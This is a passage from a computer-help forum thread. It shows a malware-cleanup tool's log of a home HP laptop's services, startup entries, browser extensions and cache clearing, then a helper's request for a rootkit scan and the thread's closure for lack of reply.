R2 - [Intel® Capability Licensing Service Interface] - Intel® Capability Licensing Service Interface - "C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe"
R2 - [omniserv] -  HP SimplePass Service - C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
R2 - [RtkAudioService] - Realtek Audio Service - C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
R2 - [WSearch] - Windows Search - C:\Windows\system32\SearchIndexer.exe /Embedding
S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
S2 - [sppsvc] - Software Protection - C:\Windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
S3 - [ALG] - Application Layer Gateway Service - C:\Windows\System32\alg.exe
S3 - [aspnet_state] - ASP.NET State Service - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
S3 - [COMSysApp] - COM+ System Application - C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
S3 - [cphs] - Intel® Content Protection HECI Service - C:\Windows\SysWow64\IntelCpHeciSvc.exe
S3 - [Fax] - Fax - C:\Windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
S3 - [GamesAppService] - GamesAppService - "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe"
S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
S3 - [gusvc] - Google Software Updater - "C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe"
S3 - [hpqwmiex] - HP Software Framework Service - "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe"
S3 - [ICCS] - Intel® Integrated Clock Controller Service - Intel® ICCS - "C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe"
S3 - [IEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\Windows\system32\IEEtwCollector.exe /V
S3 - [Intel® Capability Licensing Service TCP IP Interface] - Intel® Capability Licensing Service TCP IP Interface - "C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe"
S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
S3 - [MSDTC] - Distributed Transaction Coordinator - C:\Windows\System32\msdtc.exe
S3 - [msiserver] - Windows Installer - C:\Windows\system32\msiexec.exe /V
S3 - [PerfHost] - Performance Counter DLL Host - C:\Windows\SysWow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\Windows\system32\locator.exe
S3 - [SNMPTRAP] - SNMP Trap - C:\Windows\System32\snmptrap.exe
S3 - [TrustedInstaller] - Windows Modules Installer - C:\Windows\servicing\TrustedInstaller.exe
S3 - [vds] - Virtual Disk - C:\Windows\System32\vds.exe
S3 - [VSS] - Volume Shadow Copy - C:\Windows\system32\vssvc.exe
S3 - [wbengine] - Block Level Backup Engine Service - "C:\Windows\system32\wbengine.exe"
S3 - [WdNisSvc] - Windows Defender Network Inspection Service - "C:\Program Files\Windows Defender\NisSrv.exe"
S3 - [WinDefend] - Windows Defender Service - "C:\Program Files\Windows Defender\MsMpEng.exe"
S3 - [wmiApSrv] - WMI Performance Adapter - C:\Windows\system32\wbem\WmiApSrv.exe
S3 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

==== Deleting Services ======================


==== Deleting Files \ Folders ======================

C:\Program Files (x86)\Free_Ven_s_pro 25 not found
C:\Program Files (x86)\Mediaa_Play_AIR_1.4 not found
"C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\extensions\[email protected]9c1ae6f92.com" not found
"C:\Windows\SysNative\tasks\temp_ada83cfd-5ef3-4064-a75e-640321c9eafb-7" deleted
"C:\Windows\SysNative\tasks\temp_d71a77cf-58c7-4391-af6b-052d6a49ce04-7" deleted

==== System Specs ======================

Windows: Windows Version 6.2 (Build 9200)
Memory (RAM): 3993 MB
CPU Info: Intel® Celeron® CPU  N2810  @ 2.00GHz
CPU Speed: 2045.9 MHz
Sound Card: Speaker/HP (Realtek High Defini |
Display Adapters: Intel® HD Graphics | Intel® HD Graphics
Monitors: 1x; Generic PnP Monitor |
Screen Resolution: 1366 X 768 - 32 bit
Network: Network Present
Network Adapters: Microsoft Wi-Fi Direct Virtual Adapter #2 | Microsoft Wi-Fi Direct Virtual Adapter | Qualcomm Atheros QCA9565 802.11b/g/n WiFi Adapter | Realtek PCIe FE Family Controller
CD / DVD Drives: 1x (E: | ) E: hp      CDDVDW SU-208FB
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 5 Button Wheel Mouse Present
Hard Disks: C:  914.8GB | D:  15.9GB
Hard Disks - Free: C:  851.1GB | D:  1.6GB
Manufacturer *: Hewlett-Packard
BIOS Info: AT/AT COMPATIBLE |  | HPQOEM - 3
Time Zone: GMT Standard Time
Motherboard *: Hewlett-Packard 2190
Country: United Kingdom
Language: ENG

==== System Specs (Software) ======================

Anti-Virus: Windows Defender On-access scanning disabled (Outdated)
Anti-Virus: avast! Antivirus On-access scanning disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Anti-Spyware: avast! Antivirus disabled (Outdated)
Internet Explorer Version: 11.0.9600.17107
Mozilla Firefox version: 29.0.1 (x86 en-GB)
Google Chrome version: 35.0.1916.114
Flash Player version: 13.0.0.214
Shockwave Player version: 12.0.4r144

==== Startup Registry Enabled ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YouCam Service"="C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe /s"
"HPMessageService"="C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe"
"AvastUI.exe"="C:\Program Files\AVAST Software\Avast\AvastUI.exe /nogui"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\Windows\system32\igfxtray.exe"
"HotKeysCmds"="C:\Windows\system32\hkcmd.exe"
"Persistence"="C:\Windows\system32\igfxpers.exe"
"RTHDVCPL"="C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s"
"SimplePass"="C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe /hideui"
"OPBHOBroker"="C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe"
"OPBHOBrokerDesktop"="C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe"
"Classic Start Menu"="C:\Program Files\Classic Shell\ClassicStartMenu.exe -autorun"
"SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe "

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"NCPluginUpdater"="C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe Update"

==== Startup Folders ======================

2014-06-09 05:28:39    1195    ----a-w-    C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DesktopWeatherAlerts.lnk
2014-06-09 05:30:02    1163    ----a-w-    C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Weather Alerts.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a-------- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [13/05/2014 21:23]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [04/05/2014 16:56]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [04/05/2014 16:56]
C:\Windows\tasks\HPCeeScheduleForpaulj_000.job --a-------- C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [15/07/2011 04:43]
C:\Windows\tasks\HPCeeScheduleForSarah.job --a-------- C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [15/07/2011 04:43]

==== Other Scheduled Tasks ======================

"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\CLMLSvc_P2G8" [C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe]
"C:\Windows\SysNative\tasks\CLVDLauncher" [C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\HPCeeScheduleForpaulj_000" [C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe]
"C:\Windows\SysNative\tasks\HPCeeScheduleForSarah" [C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe]
"C:\Windows\SysNative\tasks\Synaptics TouchPad Enhancements" ["C:\Program Files\Synaptics\SynTP\SynTPEnh.exe"]
"C:\Windows\SysNative\tasks\User_Feed_Synchronization-{02818842-BFB5-4559-BA7D-2FE689C8B86C}" [C:\Windows\system32\msfeedssync.exe]
"C:\Windows\SysNative\tasks\User_Feed_Synchronization-{F986E634-3E42-4B80-80BA-BBC8DF9E2D1E}" [C:\Windows\system32\msfeedssync.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\Update Check" [C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe]

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]"="C:\Program Files\AVAST Software\Avast\WebRep\FF" [04/05/2014 16:54]

==== Firefox Extensions ======================

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default
A58DE0A570148AF5FF3512B2A340D09F    - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll -    Shockwave Flash
0C0C5C207121C7A78414A8250E8E099A    - C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll -    Shockwave for Director / Shockwave for Director


==== Chrome Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
gomekmidlodglbbmalcneegieacbdmki - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx[04/05/2014 16:53]

Google Drive - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
avast Online Security - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Google Wallet - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Google Docs - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
avast Online Security - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Google Wallet - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{6A1806CD-94D4-4689-BA73-E35EA1EA9990}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/...TR&pc=CPNTDFJS"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Google  Url="http://www.google.co...ge={startPage}"

==== Empty IE Cache ======================

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\paulj_000\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\paulj_000\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\Users\Sarah\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Sarah\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

==== Empty FireFox Cache ======================

C:\Users\paulj_000\AppData\Local\Mozilla\Firefox\Profiles\f7t4qr94.default\Cache emptied successfully
C:\Users\Sarah\AppData\Local\Mozilla\Firefox\Profiles\bsba1crn.default\Cache emptied successfully

==== Empty Chrome Cache ======================

C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

No Java Cache Found

==== C:\zoek_backup content ======================

C:\zoek_backup (files=311 folders=53 3641778 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Default User\AppData\Local\Temp emptied successfully
C:\Users\paulj_000\AppData\Local\Temp will be emptied at reboot
C:\Users\Sarah\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\PAULJ_~1\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== EOF on 11/06/2014 at 18:14:38.87 ======================
 

It appears to be running much more quickly now however it has crashed once.


  • 0

#9
peejaygee

peejaygee

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

I have lost the original report from gmer. shall i run it again?


  • 0

#10
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts

Hi :)

 

Yes, please re-run Gmer. I need a rootkit-scanner report to review :)

 

Cheers,

Naat :)


  • 0

#11
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts
Hi :)

Are you still somewhere around?

Cheers,
Naat :)
  • 0

#12
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP